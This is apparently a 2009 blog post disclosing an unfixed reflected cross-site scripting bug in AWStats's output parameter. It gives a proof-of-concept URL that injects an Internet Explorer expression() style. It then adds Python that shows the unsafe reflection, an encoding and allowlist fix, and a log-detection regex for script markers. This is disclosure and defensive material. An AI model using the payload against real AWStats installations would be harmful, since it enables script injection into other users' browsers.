Monday, May 25, 2009

XSS in AWStats, no 0day, 2year!

I don't really like releasing information about security bugs this way. But I'd rather have people know about a bug in the software they use if it's not fixed. The information has been publicly available in the SourceForge tracker anyway.

AWStats contains a cross-site scripting (XSS) vulnerability in the output parameter: its value is reflected into the generated HTML without encoding, so a double quote in the value closes the attribute it lands in and whatever follows becomes new markup:

http://[domain]/awstats/awstats.pl?config=[example.com]&framename=mainright&output="%20style="width:%20expression(alert('XSS'));"

This one doesn't work in FF, but it does in IE7 (the payload relies on the proprietary CSS expression() that only Internet Explorer evaluates).
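The following is an added illustration written for this post, not code from AWStats (which is Perl) or from its author. It uses a made-up HTML template for where the output parameter might be reflected; the real AWStats markup is not shown here, and the allowlist pattern for valid report names is an assumption. It shows the bug pattern (raw reflection into an attribute), the fix (attribute-context encoding plus boundary validation), and goes slightly beyond the post by adding a check for access-log lines that carry the same expression() trick in any awstats.pl parameter.

```python
import html
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import parse_qs, unquote, urlparse

# The post's proof-of-concept value for the `output` parameter, URL-decoded.
# Constructed here as test input only.
PAYLOAD = unquote('"%20style="width:%20expression(alert(\'XSS\'));"')


def render_unsafe(output: str) -> str:
    """Bug pattern: the query value is dropped straight into an attribute.
    (The <input> template is an assumed illustration, not AWStats' markup.)"""
    return f'<input type="hidden" name="output" value="{output}">'


def render_safe(output: str) -> str:
    """Fix: encode for the attribute context; the quote can no longer close it."""
    return f'<input type="hidden" name="output" value="{html.escape(output, quote=True)}">'


class _AttrCollector(HTMLParser):
    """Collects the attributes the browser-side parser would see on the tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs.update(attrs)


def parse_input_attrs(markup: str) -> dict:
    """Return the attribute dict of the rendered <input>; an injected
    `style` key means the payload escaped the value attribute."""
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return p.attrs


# Assumed allowlist: report names are short lowercase tokens. Rejecting
# anything else at the boundary keeps hostile values out of the template
# regardless of how the output is later encoded.
_TOKEN = re.compile(r"[a-z0-9_]{1,32}")


def validate_output(value: str) -> Optional[str]:
    return value if _TOKEN.fullmatch(value) else None


# Detection side: a constructed access-log line for the post's request.
LOG_LINE = (
    '10.0.0.5 - - [25/May/2009:10:00:00 +0000] "GET /awstats/awstats.pl'
    '?config=example.com&framename=mainright'
    '&output=%22%20style%3D%22width%3A%20expression(alert(%27XSS%27))%3B%22'
    ' HTTP/1.1" 200 512'
)

_MARKER = re.compile(r"expression\s*\(|<script|javascript:", re.I)


def suspicious_request(log_line: str) -> bool:
    """True if an awstats.pl request carries script/expression() markers in
    any decoded query parameter."""
    m = re.search(r'"GET (\S+) HTTP', log_line)
    if not m:
        return False
    url = urlparse(m.group(1))
    if not url.path.endswith("awstats.pl"):
        return False
    for values in parse_qs(url.query, keep_blank_values=True).values():
        if any(_MARKER.search(v) for v in values):
            return True
    return False


if __name__ == "__main__":
    print("unsafe attrs:", parse_input_attrs(render_unsafe(PAYLOAD)))
    print("safe attrs:  ", parse_input_attrs(render_safe(PAYLOAD)))
    print("validated:   ", validate_output(PAYLOAD))
    print("log flagged: ", suspicious_request(LOG_LINE))
```

The encoded version keeps the full payload as an inert attribute value (the parser returns it as `value`, with no `style` key), which is why encoding at the point of output is the fix rather than stripping particular strings; the allowlist is defence in depth, and the log check is only useful for spotting attempts after the fact.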

(I tried contacting the author in several ways, no response.)
